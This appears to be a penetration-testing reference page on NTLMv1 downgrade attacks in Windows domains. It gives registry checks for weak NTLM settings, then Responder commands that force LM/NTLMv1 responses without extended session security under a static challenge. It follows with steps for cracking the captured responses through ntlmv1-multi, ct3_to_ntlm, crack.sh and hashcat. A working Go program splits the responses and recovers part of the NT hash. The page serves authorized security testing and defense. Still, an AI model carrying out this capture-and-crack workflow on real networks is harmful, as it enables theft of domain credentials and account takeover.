# NTLMv1 Downgrade

* <https://github.com/NotMedic/NetNTLMtoSilverTicket>
* <https://www.praetorian.com/blog/ntlmv1-vs-ntlmv2/>
* <https://www.trustedsec.com/blog/practical-attacks-against-ntlmv1/>
* <https://www.r-tec.net/r-tec-blog-netntlmv1-downgrade-to-compromise.html>

A client sends an NTLMv1 response when `LmCompatibilityLevel` exists and is `2` or lower (if the value is absent, Windows Vista/Server 2008 and later default to `3`, i.e. NTLMv2 only). A rogue server can additionally strip extended session security and obtain plain "NTLMv1 w/o SSP" as long as `NtlmMinClientSec` does not contain the `0x80000` bit (require NTLMv2 session security), which is the case for `0x20` or lower:

| Property Name                                                                                                                                                          | Property Path                                      |
| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------- |
| [LmCompatibilityLevel](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level) | `HKLM\SYSTEM\CurrentControlSet\Control\Lsa`        |
| [NtlmMinClientSec](http://systemmanager.ru/win2k_regestry.en/85673.htm)                                                                                                | `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0` |

## Check

Check with PowerShell (`Get-ItemProperty` throws if a value has never been set, which means the OS default applies):

```
PS > (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name LmCompatibilityLevel).LmCompatibilityLevel
2
PS > # 0-2: the client still sends LM/NTLMv1 responses; 3 and above: NTLMv2 only
PS > $decValue = (Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ -Name NtlmMinClientSec).NtlmMinClientSec
PS > $hexValue = "0x" + [string]::Format("{0:x}", $decValue)
PS > $hexValue
0x20
PS > # 0x20 = require message confidentiality only; the 0x80000 bit (require NTLMv2 session security) is not set, so ESS can be stripped
```

Check with [Seatbelt](https://github.com/GhostPack/Seatbelt/blob/fa0f2d94a049d825bef77e103e33167250ed2ac0/Seatbelt/Commands/Windows/NtlmSettingsCommand.cs#L149) ([example](https://0xdf.gitlab.io/2021/04/10/htb-apt.html#seatbelt)):

```
Cmd > .\Seatbelt.exe NTLMSettings
```

## Abuse

{% content-ref url="../authentication-coercion" %}
[authentication-coercion](https://ppn.snovvcra.sh/pentest/infrastructure/ad/authentication-coercion)
{% endcontent-ref %}

Abuse with Responder: `--lm` forces an LM downgrade for legacy clients and `--disable-ess` strips extended session security so NTLMv1 responses arrive without SSP. Make sure `Challenge` in `Responder.conf` is the static `1122334455667788` rather than `Random`, since the public rainbow tables and crack.sh expect that challenge (see **Authentication Coercion** to trigger callbacks):

```
$ sudo ./Responder.py -I eth0 -v --lm --disable-ess
```

## ntlmv1-multi + crack.sh

* <https://crack.sh/netntlm/>
* <https://crack.sh/get-cracking/>
* <https://crack.sh/cracking-ntlmv1-w-ess-ssp/>
* <https://github.com/evilmog/ntlmv1-multi>

Feed the captured `user::DOMAIN:lmresp:ntresp:challenge` line to ntlmv1-multi; it splits the NT response into its three DES blocks (`CT1`..`CT3`) and prints the crack.sh token along with the hashcat `-m 14000` input:

```
$ python ntlmv1.py --ntlmv1 '<NTLMv1_RESPONSE_STRING>'
```

Recover the final 2 bytes (4 hex characters) of the NT hash from the third DES block and the challenge; `CT3` is encrypted under a key of only 2 unknown bytes plus 5 zero bytes, so this is instant:

```
$ ~/tools/hashcat-utils/src/ct3_to_ntlm.bin <CT3> 1122334455667788
```
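The split that ntlmv1-multi and `ct3_to_ntlm` perform, written out as an added Go example (this is not code from ntlmv1-multi, crack.sh or this page; Go is used because its standard library ships single DES). It builds NTLMv1 responses for a constructed NT hash (not from any real account) under the static `1122334455667788` challenge, handles both plain NTLMv1 (what `--disable-ess` forces) and NTLMv1-ESS (client challenge plus zeros in the LM field, MD5-derived effective challenge), recovers the last two NT hash bytes from `CT3` by trying all 2^16 K3 values, and emits the `CT1:challenge` / `CT2:challenge` lines for hashcat `-m 14000`. The user, domain, NT hash and client challenge values are made up.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/md5"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// desBlock DES-encrypts one 8-byte block under a 7-byte key fragment. The 56
// key bits are spread over 8 bytes, 7 per byte; DES ignores each byte's low
// (parity) bit, so crypto/des needs no parity fix-up.
func desBlock(k7, block []byte) []byte {
	k := []byte{k7[0], 0, 0, 0, 0, 0, 0, k7[6] << 1}
	for i := 1; i < 7; i++ {
		k[i] = k7[i-1]<<(8-i) | k7[i]>>i
	}
	c, _ := des.NewCipher(k) // k is always 8 bytes, so NewCipher cannot fail
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// NTLMv1Response pads the 16-byte NT hash with 5 zero bytes, splits it into
// K1|K2|K3 (7 bytes each) and DES-encrypts the same challenge under each key.
// K1 and K2 are independent 56-bit DES jobs; K3 is 2 hash bytes plus 5 zeros.
func NTLMv1Response(ntHash, challenge []byte) []byte {
	padded := make([]byte, 21)
	copy(padded, ntHash)
	var resp []byte
	for i := 0; i < 21; i += 7 {
		resp = append(resp, desBlock(padded[i:i+7], challenge)...)
	}
	return resp
}

// EffectiveChallenge returns the bytes that were really DES-encrypted and whether
// ESS was used: with NTLMv1-ESS the LM field is an 8-byte client challenge plus
// 16 zero bytes and the DES plaintext is MD5(serverChallenge||clientChallenge)[:8].
func EffectiveChallenge(serverChallenge, lmResp []byte) ([]byte, bool) {
	if len(lmResp) == 24 && bytes.Equal(lmResp[8:], make([]byte, 16)) {
		sum := md5.Sum(append(append([]byte{}, serverChallenge...), lmResp[:8]...))
		return sum[:8], true
	}
	return serverChallenge, false
}

// RecoverHashTail brute-forces NT hash bytes 14 and 15 from CT3: only 2^16 K3
// candidates exist (the same trick hashcat-utils' ct3_to_ntlm relies on).
func RecoverHashTail(ct3, challenge []byte) ([]byte, bool) {
	k7 := make([]byte, 7)
	for cand := 0; cand < 1<<16; cand++ {
		k7[0], k7[1] = byte(cand>>8), byte(cand)
		if bytes.Equal(desBlock(k7, challenge), ct3) {
			return []byte{k7[0], k7[1]}, true
		}
	}
	return nil, false
}

// SplitNTLMv1 parses a Responder/JtR line user::DOMAIN:lmresp:ntresp:challenge and
// returns the two "CTn:challenge" hex jobs for hashcat -m 14000 (K1 and K2), the
// hash tail recovered from CT3, and whether ESS was in use. A CT3 miss means the
// line is not an NTLMv1 response to that challenge (e.g. it is NTLMv2).
func SplitNTLMv1(line string) ([2]string, []byte, bool, error) {
	f := strings.Split(strings.TrimSpace(line), ":")
	if len(f) != 6 {
		return [2]string{}, nil, false, errors.New("expected user::domain:lmresp:ntresp:challenge")
	}
	lm, e1 := hex.DecodeString(f[3])
	nt, e2 := hex.DecodeString(f[4])
	ch, e3 := hex.DecodeString(f[5])
	if e1 != nil || e2 != nil || e3 != nil || len(nt) != 24 || len(ch) != 8 {
		return [2]string{}, nil, false, errors.New("malformed hex fields")
	}
	eff, ess := EffectiveChallenge(ch, lm)
	tail, ok := RecoverHashTail(nt[16:], eff)
	if !ok {
		return [2]string{}, nil, ess, errors.New("CT3 matched no K3 candidate")
	}
	e := hex.EncodeToString(eff)
	return [2]string{hex.EncodeToString(nt[:8]) + ":" + e, hex.EncodeToString(nt[8:16]) + ":" + e}, tail, ess, nil
}

func main() {
	// Constructed sample: an arbitrary NT hash (no real account) and the static Responder challenge.
	ntHash, _ := hex.DecodeString("5b4c1e2f8a9d3c7e6f0a1b2c3d4e5f60")
	ch, _ := hex.DecodeString("1122334455667788")
	plain := NTLMv1Response(ntHash, ch)                                              // plain NTLMv1, as forced by --disable-ess
	essLM := append([]byte("\xaa\xbb\xcc\xdd\xee\xff\x00\x11"), make([]byte, 16)...) // ESS LM field: client challenge + zeros
	effCh, _ := EffectiveChallenge(ch, essLM)
	for _, line := range []string{
		fmt.Sprintf("user::CORP:%x:%x:%x", plain, plain, ch),
		fmt.Sprintf("user::CORP:%x:%x:%x", essLM, NTLMv1Response(ntHash, effCh), ch),
	} {
		jobs, tail, ess, err := SplitNTLMv1(line)
		fmt.Printf("ESS=%v tail=%x jobs=%v err=%v\n", ess, tail, jobs, err)
	}
}
```

`go run` prints both captures split. The plain case reports `ESS=false` and its hashcat jobs carry `1122334455667788`; the ESS case carries the MD5-derived challenge instead, which is why a capture where ESS was not stripped cannot be thrown at rainbow tables built for the static challenge and must go to DES brute force with the per-session value.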

## Public Rainbow Tables

* <https://ntlmv1.com/>
* <https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables>
